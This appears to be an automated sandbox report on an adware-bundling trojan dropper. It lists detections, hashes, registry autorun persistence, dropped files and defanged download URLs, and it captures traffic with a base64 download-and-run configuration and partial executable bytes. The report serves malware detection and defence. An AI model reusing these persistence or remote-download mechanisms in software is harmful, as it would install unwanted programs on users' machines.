Gen.Variant.Strictor.109765_cdeec13765
Gen:Variant.Strictor.109765 (BitDefender), SoftwareBundler:MSIL/Wizrem (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.WizzMonetize.1 (DrWeb), Gen:Variant.Strictor.109765 (B) (Emsisoft), PUP-XDE-TD (McAfee), Trojan.Gen.2 (Symantec), Gen:Variant.Strictor.109765 (FSecure), Win32:Adware-gen [Adw] (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GEN.R039C0PKO17 (TrendMicro), Gen:Variant.Strictor.109765 (AdAware), Installer.Win32.InnoSetup.FD, Installer.Win32.InnoSetup.2.FD, mzpefinder_pcap_file.YR, InstallerInnoSetup.YR (Lavasoft MAS)
Behaviour: Trojan, Installer, PUP, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: cdeec13765ba7237961b212c71dfbc1a
SHA1: fc5b39e5109dbbd01dcec4a3d0883a4107a9c0d6
SHA256: 2fc835c126a053bc93c9c3d362c481a949c0a2732575468baaddb47434b80089
SSDeep: 1536:gK5V2sf5EeMcKkVrOskCu2D6RW/obAMwdwQF:j5VqBcPrOsz6RWbdtF
Size: 54784 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: TweakBit
Created at: 2017-11-24 04:15:04
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
SecondL.exe:3236
wyrm4bnfuck.exe:2968
OneTwo.exe:840
up.exe:3864
%original file name%.exe:3676
The Trojan injects its code into the following process(es):
58NPSAZXW.exe:2692
%original file name%.exe:3032
wyrm4bnfuck.tmp:2520
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SecondL.exe:3236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe (68980 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.3236.7073381 (0 bytes)
The process wyrm4bnfuck.exe:2968 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MJFS9.tmp\wyrm4bnfuck.tmp (1569 bytes)
The process OneTwo.exe:840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\58NPSAZXWZ\58NPSAZXW.exe (69780 bytes)
%Program Files%\58NPSAZXWZ\uninstaller.exe (2590 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
%Program Files%\58NPSAZXWZ\58NPSAZXW.exe.config (1 bytes)
%Program Files%\58NPSAZXWZ\uninstaller.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.840.7073522 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.840.7073522 (0 bytes)
The process 58NPSAZXW.exe:2692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\58NPSAZXWZ\cast.config (37 bytes)
The process up.exe:3864 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (836 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (836 bytes)
The process %original file name%.exe:3032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe (2452 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe (145806 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe.config (1 bytes)
The process wyrm4bnfuck.tmp:2520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\itdownload.dll (1489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\idp.dll (1502 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\psvince.dll (88 bytes)
Registry activity
The process SecondL.exe:3236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process OneTwo.exe:840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 58NPSAZXW.exe:2692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\58NPSAZXW_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HJ2O0Z2VCIVQCDU" = "%Program Files%\58NPSAZXWZ\58NPSAZXW.exe"
The process up.exe:3864 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"EnableConsoleTracing" = "0"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\up_RASMANCS]
"MaxFileSize" = "1048576"
The process %original file name%.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:3032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\cdeec13765ba7237961b212c71dfbc1a_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_A1904" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process wyrm4bnfuck.tmp:2520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"Owner" = "D8 09 00 00 3F 78 AB 94 99 C4 D3 01"
"SessionHash" = "EF 2C E8 60 18 16 4E 1D 6D E4 E8 E4 4D 42 A8 93"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"4147223" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe /VERYSILENT"
Dropped PE files
MD5 | File path |
---|---|
7a16fdd24964f3db7dd68cb0fe9525d9 | c:\Program Files\58NPSAZXWZ\58NPSAZXW.exe |
8a11cbe8e1f02820cbf3d8ea0a5ea681 | c:\Program Files\58NPSAZXWZ\uninstaller.exe |
ba41fa5513ec262337ec3f8592bb662c | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe |
e3d83c4e821a3a72170999df92160a6e | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe |
0f7697b39f2a6cab1f08aea09e626791 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe |
b37377d34c8262a90ff95a9a92b65ed8 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\idp.dll |
d82a429efd885ca0f324dd92afb6b7b8 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\itdownload.dll |
d726d1db6c265703dcd79b29adc63f86 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\psvince.dll |
be1cfa8011b16d477c9833c860b0c1e2 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MJFS9.tmp\wyrm4bnfuck.tmp |
9ff3888227c0edcfe7501a60f9964cef | c:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: 08FI72
Product Name: 0
Product Version: 4.1.8.7
Legal Copyright: Copyright (c) 7996
Legal Trademarks:
Original Filename: Ksa88.exe
Internal Name: Ksa88.exe
File Version: 4.1.8.7
File Description: 0
Comments: 08FI72
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 8192 | 47712 | 48128 | 4.29726 | 0e1f168cfc3fcf86108c6d6d494703d6 |
.rsrc | 57344 | 5336 | 5632 | 3.48156 | 1b5d0557f92a5ac2254f458e9ca950cc |
.reloc | 65536 | 12 | 512 | 0.056519 | 46c66e5da65eb13236f31ca0c4cb15db |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
URL | IP |
---|---|
hxxp://www.wizzmonetize.com/remotes_xml_sections.php | ![]() |
hxxp://asedownloadgate.com/from_backup/747474/AdsShow_installer.exe | ![]() |
hxxp://asedownloadgate.com/3/000000/wizzcaster_installer_v2.exe | ![]() |
hxxp://asedownloadgate.com/exe/updater.exe | ![]() |
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | ![]() |
hxxp://www.wizzmonetize.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | ![]() |
hxxp://asedownloadgate.com/safe_download/582369/AdsShow.exe | ![]() |
hxxp://asedownloadgate.com/download/3/wizzcaster_v2.exe | ![]() |
hxxp://asedownloadgate.com/download/3/wizzcaster_uninstaller_v2.exe | ![]() |
hxxp://www.wizzmonetize.com/api/v5/config | ![]() |
hxxp://www.wizzmonetize.com/api/v5/link | ![]() |
agent.wizztrakys.com | ![]() |
ladomainadeserver.com | ![]() |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownloada2a00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
.../<.Z.........."...0..............4... ...@....@.. ..............
......................@..................................4..O....@....
...................`.......4..........................................
..... ............... ..H............text........ ....................
.. ..`.rsrc........@......................@..@.reloc.......`.......(..
............@..B.................4......H........!.............../..X.
...........................................0..o.......(....~....o....s
....o.............~....(....(......(....o....r...po.....(.....o....t".
.........%...o....&..&..*.........kk.......0..M........(.....s....%(..
...o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p...
..r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~...
.*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.5
0727......l...t...#~...... ...#Strings............#US.........#GUID...
....P...#Blob...........W..........3........ ...................,.....
..............................................Y.................^.....
......<.................y.......................K..................
...........Y.....p.....0.......$...3.......J.....J...............s....
.R....._.......................?.....(...........j....................
...s.......................................z.P.=......... .m.=........
...m.e...............................Z...P ............. .........<<< skipped >>>
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: asedownloadgate.com
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:30:00 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload6e00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..0<.Z.........."...0..Z..........fx... ........@.. ...............
.....................@..................................x..O.......(..
..........................w...........................................
.... ............... ..H............text...lX... ...Z.................
. ..`.rsrc...(............\..............@..@.reloc...............l...
...........@..B................Gx......H........!.............../...G.
..........................................0..o.......(....~....o....s.
...o.............~....(....(......(....o....r...po.....(.....o....t"..
........%...o....&..&..*.........kk.......0..M........(.....s....%(...
..o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p....
.r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~....
*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.50
727......l...t...#~...... ...#Strings............#US.........#GUID....
...P...#Blob...........W..........3........ ...................,......
.............................................Y.................^......
.....<.................y.......................K...................
..........Y.....p.....0.......$...3.......J.....J...............s.....
R....._.......................?.....(...........j.....................
..s.......................................z.P.=......... .m.=.........
..m.e...............................Z...P ............. ..........<<< skipped >>>
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:59 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownloadd21e5..MZP.....................@......................................
.........!..L.!..This program must be run under Win32..$7.............
......................................................................
.....................................................PE..L....^B*.....
................N....................@..........................`.....
.......@......@..............................|.... ...<............
......................................................................
........................CODE................................ ..`DATA..
..P...........................@...BSS.................................
.....idata..|...........................@....tls......................
...............rdata..............................@..P.reloc..........
....................@..P.rsrc....<... ...>..................@..P
.............P......................@..P..............................
......................................................................
..............................................................string..
..............<.@.....m.@..........)@..(@..(@..)@.....$)@..Free..0)
@..InitInstance..L)@..CleanupInstance..h(@..ClassType..l(@..ClassName.
..(@..ClassNameIs...(@..ClassParent...)@..ClassInfo...(@..InstanceSize
...)@..InheritsFrom...)@..Dispatch...)@..MethodAddress..<*@..Method
Name..x*@..FieldAddress...)@..DefaultHandler...(@..NewInstance...(@..F
reeInstance.TObject.@...@..% .@....%..@....%..@....%..@....%..@....%..
@....%..@....%(.@....%..@....%..@....%..@....%..@....%..@....%..@.<<< skipped >>>
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:48 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=89kkkv9bvapjoreosptm6a03i6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1608
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8PHVwZGF0ZXMgcmVmcmVzaD0iOTAiPgoKPHRhc2s DQoNCjxwZXJmb3JtPg0KDQo8ZG93bm
xvYWQgbmFtZT0iU2Vjb25kTCIgdmFsdWU9Imh0dHA6Ly9hc2Vkb3dubG9hZGdhdGUuY29t
L2Zyb21fYmFja3VwLzc0NzQ3NC9BZHNTaG93X2luc3RhbGxlci5leGUiIHZlcnNpb249Ii
IgIHNvZnR3YXJlPSIiIG5ldD0ieWVzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5h
bWU9IlNlY29uZEwiIHZhbHVlPSJub3R3YWl0IiBwYXJhbXM9Im5pbXBvcnRlIi8 DQo8bW
9kIHR5cGU9ImFkZCIgbmFtZT0iUXNPbmUiIHZhbHVlPSIxODAzMjYiLz4NCg0KPC9wZXJm
b3JtPg0KDQo8Y29uZGl0aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iUXNPbm
UiIHZhbHVlPSI0NTE4MDMyNiIgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4N
CjwvdGFzaz48dGFzaz4NCg0KPHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJPbmVUd2
8iIHZhbHVlPSJodHRwOi8vYXNlZG93bmxvYWRnYXRlLmNvbS8zLzAwMDAwMC93aXp6Y2Fz
dGVyX2luc3RhbGxlcl92Mi5leGUiIHZlcnNpb249IiIgIHNvZnR3YXJlPSIiIG5ldD0ieW
VzIiAvPg0KPHByb2Nlc3MgdHlwZT0ic3RhcnQiIG5hbWU9Ik9uZVR3byIgdmFsdWU9Im5v
dHdhaXQiIHBhcmFtcz0iNTdhNzY0ZDA0MmJmOCIvPg0KPG1vZCB0eXBlPSJhZGQiIG5hbW
U9IkhhaGEiIHZhbHVlPSIwMDAxODAzMjYiLz4NCg0KPC9wZXJmb3JtPg0KDQo8Y29uZGl0
aW9ucz4NCg0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iSGFoYSIgdmFsdWU9IjE4MDMyNi
IgbWF0Y2g9ImZhbHNlIi8 DQoNCjwvY29uZGl0aW9ucz4NCjwvdGFzaz48dGFzaz4NCg0K
PHBlcmZvcm0 DQoNCjxkb3dubG9hZCBuYW1lPSJ1cCIgdmFsdWU9Imh0dHA6Ly9hc2Vkb3
dubG9hZGdhdGUuY29tL2V4ZS91cGRhdGVyLmV4ZSIgdmVyc2lvbj0iIiAgc29mdHdhcmU9
IiIgbmV0PSJ5ZXMiIC8 DQo8cHJvY2VzcyB0eXBlPSJzdGFydCIgbmFtZT0idXAiIHZhbH
VlPSJ3YWl0IiBwYXJhbXM9IndlIi8 DQo8bW9kIHR5cGU9ImFkZCIgbmFtZT0iRGF0ZSIg
dmFsdWU9ImZlOGYxODAzMjYiLz4NCg0KPC9wZXJmb3JtPg0KDQo8Y29uZGl0aW9ucz4NCg
0KPG1vZCB0eXBlPSJjaGVjayIgbmFtZT0iRGF0ZSIgdmFsdWU9IjE4MDMyNiIgbWF0<<< skipped >>>
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: asedownloadgate.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Content-Length: 7168
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownloadMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Z
.........."...0.............N0... ...@....@.. ........................
............@................................../..O....@..............
.........`....................................................... ....
........... ..H............text...T.... ...................... ..`.rsr
c........@......................@..@.reloc.......`....................
..@..B................00......H........!..\...........................
.................................0............s.......(....(....r...pr
...po....(......(....&.(....r...pr...po....r...p(....(......r...p.o...
.........,..r...p...(....(....& ..r...p(....&.........*...............
..&.(......*...0..9........~.........,".r...p.....(....o....s.........
...~..... ..*....0...........~..... ..*".......*.0...........~..... ..
*".( ....*Vs....(!...t.........*..BSJB............v2.0.50727......l...
....#~..8.......#Strings............#US.........#GUID...,...0...#Blob.
..........W..........3........%...................!...................
............................#...........W.....@.......7.....7.....7...
w.7...C.7...\.7.....7.................7.....................I.....#...
..:.................S.".........k...............o.m...................
...._.....r...........B.......7.............................=.........
..O.=.........d.O.i...................2...P .............!............
.!......{.....X!............o!............x!.............!........<<< skipped >>>
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: asedownloadgate.com
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload9400..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
../<.Z.........."...0.............~.... ........@.. ...............
.....................@................................. ...O.......(..
......................................................................
.... ............... ..H............text........ .....................
. ..`.rsrc...(...........................@..@.reloc...................
...........@..B................_.......H........!.............../...o.
..........................................0..o.......(....~....o....s.
...o.............~....(....(......(....o....r...po.....(.....o....t"..
........%...o....&..&..*.........kk.......0..M........(.....s....%(...
..o....o ...%.o!...%.o"...%o#.......io$....o%...(.....o&...*Vr...p....
.r9..p.....*..('...*.~....-.ri..p.....((...o)...s*........~....*.~....
*.......*.~....*..( ...*Vs....(,...t.........*.BSJB............v2.0.50
727......l...t...#~...... ...#Strings............#US.........#GUID....
...P...#Blob...........W..........3........ ...................,......
.............................................Y.................^......
.....<.................y.......................K...................
..........Y.....p.....0.......$...3.......J.....J...............s.....
R....._.......................?.....(...........j.....................
..s.......................................z.P.=......... .m.=.........
..m.e...............................Z...P ............. ..........<<< skipped >>>
GET /exe/updater.exe HTTP/1.1
Host: asedownloadgate.com
HTTP/1.1 200 OK
Date: Mon, 26 Mar 2018 00:29:56 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload208200..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...E<.Z.........."...0..n ........... .. .... ...@.. .............
........... ...........@.................................k. .O..... .(
..................... ....... ........................................
...... ............... ..H............text....m .. ...n ..............
... ..`.rsrc...(..... ......p .............@..@.reloc........ .......
.............@..B.................. .....H........!.............../..@
] ..........................................0..o.......(....~....o....
s....o.............~....(....(......(....o....r...po.....(.....o....t"
..........%...o....&..&..*.........kk.......0..M........(.....s....%(.
